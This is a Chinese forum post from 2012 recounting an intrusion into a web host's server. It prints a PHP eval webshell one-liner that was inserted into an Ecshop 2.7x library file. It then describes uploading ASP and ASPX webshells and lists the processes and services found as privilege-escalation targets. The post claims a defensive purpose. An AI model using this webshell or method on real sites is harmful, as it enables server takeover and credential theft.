检测某IDC服务器从入侵提权谈主机防御

[复制链接]
查看1191 | 回复0 | 2012-4-1 19:25:35 | 显示全部楼层 |阅读模式
主题:检测某IDC服务器从入侵提权谈主机防御
前言:记录一次检测网站拿下服务器的检测报告。写出此文仅供参考,以便更好的防范入侵。
目标服务器:Windows2003+iis6+php+mysql+mssql+serv-u
目标网站:Ecshop2.7x
提权:
通常步骤
1、上传aspwebshell检测可用组件,端口,目录。
2、上传aspxwebhsell测试执行命令,获取进程、服务、端口信息
入手
Echop2.7x暴过几个注入,很容易取到后台登录密码。
这个利用方法百度都有,不在一一描述。
后台Getshell,也有很多方法。这里用到模块管理-库项目管理-选择myship.lbi里插入<?phpeval($_POST['c'])?>
连接http://site/myship.php一句话
信息收集
一、检测权限
1.先phpshell检测服务器上的目录浏览权限,D:/wwwroot/xxx/wwwroot/可以看出是IDC管理网站的做法,独立用户单独权限处理当前用户无法跳转跨目录。
另外,CDEF盘都无浏览权限。因为PHP和ASP继承的是IIS用户的权限,所以都不能列出目录。
2.列出程序目录,

程序目录

程序目录

360、MicrosoftSQLServer先想到两种提权方法
二、检测目标服务
上传aspshell检测服务器组件
1.wscript.shell×命令行执行组件不支持
2.常用端口
127.0.0.1:1433.........开放
127.0.0.1:3389.........关闭
127.0.0.1:43958.........开放
3.C:\DocumentsandSettings\AllUsers\无权限访问
 C:\DocumentsandSettings\AllUsers\「开始」菜单\程序\无权限访问
C:\DocumentsandSettings\AllUsers\Documents\可读取写入
4.查看系统服务-用户账号对象不支持此属性或方法(禁用了Workstation)
5.查看管理员他奶奶的不行啊:Wscript.Network(禁用了Wscript.Network)
上传aspxshell检测服务器可执行命令
1.ASPX继承users组权限,对CDEF盘都无浏览权限。
2.默认调用c:\windows\system32\cmd.exe无权访问。

cmd

cmd

3.IISSPY可列IIS用户、密码、域名以及本地路径。

IIS用户

IIS用户

4.Process列出进程,可利用如下
11176hzclient华众主机客户端
121588r_serverRadmin控制服务端
1810660shstatmcafee杀毒
553548SERVUTRAYserv-u服务端
7310892mysqldmysql数据库
5.Services列出服务,可利用如下
291176HZCLIENTD:\hzhost\hzclient.exe
721588r_server"C:\WINDOWS\system32\r_server.exe"/service
411312McShield"C:\ProgramFiles\McAfee\VirusScanEnterprise\Mcshield.exe"
5010892MySQL51"E:\ProgramFiles\MySQL\MySQLServer5.1\bin\mysqld"--defaults-file="E:\ProgramFiles\MySQL\MySQLServer5.1\my.ini"MySQL51
795708Serv-UE:\programfiles\Serv-U\ServUDaemon.exe
发帖前要善用论坛搜索功能,那里可能会有你要找的答案或者已经有人发布过相同内容了,请勿重复发帖。
您需要登录后才可以回帖 登录 | 立即注册

本版积分规则